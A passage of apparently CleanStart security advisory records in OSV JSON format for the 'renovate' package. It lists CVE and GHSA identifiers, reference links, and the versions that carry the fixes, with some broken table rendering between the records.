},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-3ppc-4f35-3m26"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-3v7f-55p6-f55p"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-4992-7rv2-5pvq"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-5j98-mcp5-4vw2"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-737v-mqg7-c878"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-73rr-hh4g-fpgx"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-7h2j-956f-4vf2"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-7r86-cg39-jmmj"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-83g3-92jg-28cx"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-8gc5-j5rx-235r"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-8qq5-rm4j-mr97"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-8wc6-vgrq-x6cf"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-9ppj-qmqm-q256"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-c2c7-rcm5-vvqj"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-f23m-r3pf-42rh"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-f269-vfmq-vjvj"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-f886-m6hf-6m8v"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-fj3w-jwp8-x2g3"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-hffm-xvc3-vprc"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-jmr7-xgp7-cmfj"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-m7jm-9gc2-mpf2"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-phc3-fgpg-7m6h"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-qffp-2rhf-9h96"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-qpx9-hpmf-5gmw"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-r275-fr43-pm7q"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-r5fr-rjxr-66jc"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-r6q2-hw4h-h46w"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-v2v4-37r5-5v8g"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-v3rj-xjv7-4jmq"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-v9p9-hfj2-hcw8"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-vrm6-8vpv-qv8q"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-w7fw-mjwx-w883"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-xq3m-2v4x-88gg"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64756"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1525"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1526"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1527"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1528"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2229"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2327"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23745"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2391"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24842"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25128"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25547"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2581"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25896"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26278"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26960"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27143"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27144"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27601"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27903"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27904"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27942"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28292"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2950"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29786"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31802"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32141"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32280"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32281"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32282"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32283"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32289"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33036"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33750"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33810"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35209"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42338"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4800"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6951"
}
],
"related": [],
"schema_version": "1.7.3",
"summary": "Security fixes for CVE-2025-64756, CVE-2025-69873, CVE-2026-1525, CVE-2026-1526, CVE-2026-1527, CVE-2026-1528, CVE-2026-2229, CVE-2026-2327, CVE-2026-23745, CVE-2026-2391, CVE-2026-24842, CVE-2026-25128, CVE-2026-25547, CVE-2026-2581, CVE-2026-25896, CVE-2026-26278, CVE-2026-26960, CVE-2026-27143, CVE-2026-27144, CVE-2026-27601, CVE-2026-27903, CVE-2026-27904, CVE-2026-27942, CVE-2026-28292, CVE-2026-2950, CVE-2026-29786, CVE-2026-31802, CVE-2026-32141, CVE-2026-32280, CVE-2026-32281, CVE-2026-32282, CVE-2026-32283, CVE-2026-32289, CVE-2026-33036, CVE-2026-33750, CVE-2026-33810, CVE-2026-35209, CVE-2026-42338, CVE-2026-4800, CVE-2026-6951, ghsa-23c5-xmqv-rm74, ghsa-25h7-pfq9-p65f, ghsa-2g4f-4pwh-qvx6, ghsa-2mjp-6q6p-2qxm, ghsa-34x7-hfp2-rc4v, ghsa-37qj-frw5-hhjh, ghsa-38c4-r59v-3vqw, ghsa-3ppc-4f35-3m26, ghsa-3v7f-55p6-f55p, ghsa-4992-7rv2-5pvq, ghsa-5j98-mcp5-4vw2, ghsa-737v-mqg7-c878, ghsa-73rr-hh4g-fpgx, ghsa-7h2j-956f-4vf2, ghsa-7r86-cg39-jmmj, ghsa-83g3-92jg-28cx, ghsa-8gc5-j5rx-235r, ghsa-8qq5-rm4j-mr97, ghsa-8wc6-vgrq-x6cf, ghsa-9ppj-qmqm-q256, ghsa-c2c7-rcm5-vvqj, ghsa-f23m-r3pf-42rh, ghsa-f269-vfmq-vjvj, ghsa-f886-m6hf-6m8v, ghsa-fj3w-jwp8-x2g3, ghsa-hffm-xvc3-vprc, ghsa-jmr7-xgp7-cmfj, ghsa-m7jm-9gc2-mpf2, ghsa-phc3-fgpg-7m6h, ghsa-qffp-2rhf-9h96, ghsa-qpx9-hpmf-5gmw, ghsa-r275-fr43-pm7q, ghsa-r5fr-rjxr-66jc, ghsa-r6q2-hw4h-h46w, ghsa-v2v4-37r5-5v8g, ghsa-v3rj-xjv7-4jmq, ghsa-v9p9-hfj2-hcw8, ghsa-vrm6-8vpv-qv8q, ghsa-w7fw-mjwx-w883, ghsa-xq3m-2v4x-88gg applied in versions: 43.123.6-r0, 43.123.8-r1, 43.123.8-r2, 43.123.8-r3, 43.4.4-r0",
"upstream": [
"CVE-2025-64756",
"CVE-2025-69873",
"CVE-2026-1525",
"CVE-2026-1526",
"CVE-2026-1527",
"CVE-2026-1528",
"CVE-2026-2229",
"CVE-2026-2327",
"CVE-2026-23745",
"CVE-2026-2391",
"CVE-2026-24842",
"CVE-2026-25128",
"CVE-2026-25547",
"CVE-2026-2581",
"CVE-2026-25896",
"CVE-2026-26278",
"CVE-2026-26960",
"CVE-2026-27143",
"CVE-2026-27144",
"CVE-2026-27601",
"CVE-2026-27903",
"CVE-2026-27904",
"CVE-2026-27942",
"CVE-2026-28292",
"CVE-2026-2950",
"CVE-2026-29786",
"CVE-2026-31802",
"CVE-2026-32141",
"CVE-2026-32280",
"CVE-2026-32281",
"CVE-2026-32282",
"CVE-2026-32283",
"CVE-2026-32289",
"CVE-2026-33036",
"CVE-2026-33750",
"CVE-2026-33810",
"CVE-2026-35209",
"CVE-2026-42338",
"CVE-2026-4800",
"CVE-2026-6951",
"ghsa-23c5-xmqv-rm74",
"ghsa-25h7-pfq9-p65f",
"ghsa-2g4f-4pwh-qvx6",
"ghsa-2mjp-6q6p-2qxm",
"ghsa-34x7-hfp2-rc4v",
"ghsa-37qj-frw5-hhjh",
"ghsa-38c4-r59v-3vqw",
"ghsa-3ppc-4f35-3m26",
"ghsa-3v7f-55p6-f55p",
"ghsa-4992-7rv2-5pvq",
"ghsa-5j98-mcp5-4vw2",
"ghsa-737v-mqg7-c878",
"ghsa-73rr-hh4g-fpgx",
"ghsa-7h2j-956f-4vf2",
"ghsa-7r86-cg39-jmmj",
"ghsa-83g3-92jg-28cx",
"ghsa-8gc5-j5rx-235r",
"ghsa-8qq5-rm4j-mr97",
"ghsa-8wc6-vgrq-x6cf",
"ghsa-9ppj-qmqm-q256",
"ghsa-c2c7-rcm5-vvqj",
"ghsa-f23m-r3pf-42rh",
"ghsa-f269-vfmq-vjvj",
"ghsa-f886-m6hf-6m8v",
"ghsa-fj3w-jwp8-x2g3",
"ghsa-hffm-xvc3-vprc",
"ghsa-jmr7-xgp7-cmfj",
"ghsa-m7jm-9gc2-mpf2",
"ghsa-phc3-fgpg-7m6h",
"ghsa-qffp-2rhf-9h96",
"ghsa-qpx9-hpmf-5gmw",
"ghsa-r275-fr43-pm7q",
"ghsa-r5fr-rjxr-66jc",
"ghsa-r6q2-hw4h-h46w",
"ghsa-v2v4-37r5-5v8g",
"ghsa-v3rj-xjv7-4jmq",
"ghsa-v9p9-hfj2-hcw8",
"ghsa-vrm6-8vpv-qv8q",
"ghsa-w7fw-mjwx-w883",
"ghsa-xq3m-2v4x-88gg"
]
}
cleanstart-2026-ow14933
Vulnerability from cleanstart
Multiple security vulnerabilities affect the renovate package. These issues are resolved in later releases. See references for individual vulnerability details.
| URL | Type | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"affected": [
{
"package": {
"ecosystem": "CleanStart",
"name": "renovate"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "43.4.4-r0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"credits": [],
"database_specific": {},
"details": "Multiple security vulnerabilities affect the renovate package. These issues are resolved in later releases. See references for individual vulnerability details.",
"id": "CLEANSTART-2026-OW14933",
"modified": "2026-05-10T16:06:08Z",
"published": "2026-05-18T13:33:43.873182Z",
"references": [
{
"type": "ADVISORY",
"url": "https://github.com/cleanstart-dev/cleanstart-security-advisories/tree/main/advisories/2026/CLEANSTART-2026-OW14933.json"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-64756"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-69873"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-1525"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-1526"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-1527"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-1528"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-2229"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-2327"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-23745"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-2391"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-24842"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-25128"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-25547"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-2581"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-25896"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-26278"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-26960"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-27601"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-27903"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-27904"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-27942"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-28292"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-29786"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-31802"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-32141"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33036"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-23c5-xmqv-rm74"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-25h7-pfq9-p65f"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-2g4f-4pwh-qvx6"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-2mjp-6q6p-2qxm"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-34x7-hfp2-rc4v"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-37qj-frw5-hhjh"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-38c4-r59v-3vqw"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-3ppc-4f35-3m26"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-4992-7rv2-5pvq"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-5j98-mcp5-4vw2"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-73rr-hh4g-fpgx"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-7h2j-956f-4vf2"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-7r86-cg39-jmmj"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-83g3-92jg-28cx"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-8gc5-j5rx-235r"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-8qq5-rm4j-mr97"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-8wc6-vgrq-x6cf"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-9ppj-qmqm-q256"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-f269-vfmq-vjvj"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-fj3w-jwp8-x2g3"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-jmr7-xgp7-cmfj"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-m7jm-9gc2-mpf2"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-phc3-fgpg-7m6h"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-qffp-2rhf-9h96"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-qpx9-hpmf-5gmw"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-r275-fr43-pm7q"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-r6q2-hw4h-h46w"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-v9p9-hfj2-hcw8"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-vrm6-8vpv-qv8q"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-w7fw-mjwx-w883"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64756"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1525"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1526"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1527"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1528"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2229"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2327"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23745"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2391"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24842"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25128"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25547"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2581"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25896"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26278"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26960"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27601"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27903"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27904"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27942"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28292"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29786"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31802"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32141"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33036"
}
],
"related": [],
"schema_version": "1.7.3",
"summary": "Security fixes for CVE-2025-64756, CVE-2025-69873, CVE-2026-1525, CVE-2026-1526, CVE-2026-1527, CVE-2026-1528, CVE-2026-2229, CVE-2026-2327, CVE-2026-23745, CVE-2026-2391, CVE-2026-24842, CVE-2026-25128, CVE-2026-25547, CVE-2026-2581, CVE-2026-25896, CVE-2026-26278, CVE-2026-26960, CVE-2026-27601, CVE-2026-27903, CVE-2026-27904, CVE-2026-27942, CVE-2026-28292, CVE-2026-29786, CVE-2026-31802, CVE-2026-32141, CVE-2026-33036, ghsa-23c5-xmqv-rm74, ghsa-25h7-pfq9-p65f, ghsa-2g4f-4pwh-qvx6, ghsa-2mjp-6q6p-2qxm, ghsa-34x7-hfp2-rc4v, ghsa-37qj-frw5-hhjh, ghsa-38c4-r59v-3vqw, ghsa-3ppc-4f35-3m26, ghsa-4992-7rv2-5pvq, ghsa-5j98-mcp5-4vw2, ghsa-73rr-hh4g-fpgx, ghsa-7h2j-956f-4vf2, ghsa-7r86-cg39-jmmj, ghsa-83g3-92jg-28cx, ghsa-8gc5-j5rx-235r, ghsa-8qq5-rm4j-mr97, ghsa-8wc6-vgrq-x6cf, ghsa-9ppj-qmqm-q256, ghsa-f269-vfmq-vjvj, ghsa-fj3w-jwp8-x2g3, ghsa-jmr7-xgp7-cmfj, ghsa-m7jm-9gc2-mpf2, ghsa-phc3-fgpg-7m6h, ghsa-qffp-2rhf-9h96, ghsa-qpx9-hpmf-5gmw, ghsa-r275-fr43-pm7q, ghsa-r6q2-hw4h-h46w, ghsa-v9p9-hfj2-hcw8, ghsa-vrm6-8vpv-qv8q, ghsa-w7fw-mjwx-w883 applied in versions: 43.4.4-r0",
"upstream": [
"CVE-2025-64756",
"CVE-2025-69873",
"CVE-2026-1525",
"CVE-2026-1526",
"CVE-2026-1527",
"CVE-2026-1528",
"CVE-2026-2229",
"CVE-2026-2327",
"CVE-2026-23745",
"CVE-2026-2391",
"CVE-2026-24842",
"CVE-2026-25128",
"CVE-2026-25547",
"CVE-2026-2581",
"CVE-2026-25896",
"CVE-2026-26278",
"CVE-2026-26960",
"CVE-2026-27601",
"CVE-2026-27903",
"CVE-2026-27904",
"CVE-2026-27942",
"CVE-2026-28292",
"CVE-2026-29786",
"CVE-2026-31802",
"CVE-2026-32141",
"CVE-2026-33036",
"ghsa-23c5-xmqv-rm74",
"ghsa-25h7-pfq9-p65f",
"ghsa-2g4f-4pwh-qvx6",
"ghsa-2mjp-6q6p-2qxm",
"ghsa-34x7-hfp2-rc4v",
"ghsa-37qj-frw5-hhjh",
"ghsa-38c4-r59v-3vqw",
"ghsa-3ppc-4f35-3m26",
"ghsa-4992-7rv2-5pvq",
"ghsa-5j98-mcp5-4vw2",
"ghsa-73rr-hh4g-fpgx",
"ghsa-7h2j-956f-4vf2",
"ghsa-7r86-cg39-jmmj",
"ghsa-83g3-92jg-28cx",
"ghsa-8gc5-j5rx-235r",
"ghsa-8qq5-rm4j-mr97",
"ghsa-8wc6-vgrq-x6cf",
"ghsa-9ppj-qmqm-q256",
"ghsa-f269-vfmq-vjvj",
"ghsa-fj3w-jwp8-x2g3",
"ghsa-jmr7-xgp7-cmfj",
"ghsa-m7jm-9gc2-mpf2",
"ghsa-phc3-fgpg-7m6h",
"ghsa-qffp-2rhf-9h96",
"ghsa-qpx9-hpmf-5gmw",
"ghsa-r275-fr43-pm7q",
"ghsa-r6q2-hw4h-h46w",
"ghsa-v9p9-hfj2-hcw8",
"ghsa-vrm6-8vpv-qv8q",
"ghsa-w7fw-mjwx-w883"
]
}
cleanstart-2026-sw34937
Vulnerability from cleanstart
Multiple security vulnerabilities affect the renovate package. These issues are resolved in later releases. See references for individual vulnerability details.
| URL | Type | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"affected": [
{
"package": {
"ecosystem": "CleanStart",
"name": "renovate"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "43.4.4-r0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"credits": [],
"database_specific": {},
"details": "Multiple security vulnerabilities affect the renovate package. These issues are resolved in later releases. See references for individual vulnerability details.",
"id": "CLEANSTART-2026-SW34937",
"modified": "2026-03-19T07:58:44Z",
"published": "2026-04-01T09:43:38.907490Z",
"references": [
{
"type": "ADVISORY",
"url": "https://github.com/cleanstart-dev/cleanstart-security-advisories/tree/main/advisories/2026/CLEANSTART-2026-SW34937.json"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-64756"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-69873"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-1525"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-1526"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-1527"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-1528"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-2229"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-2327"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-23745"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-2391"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-24842"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-25128"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-25547"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-2581"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-25896"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-26278"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-26960"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-27601"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-27903"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-27904"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-27942"
},
{
"type": "WEB",
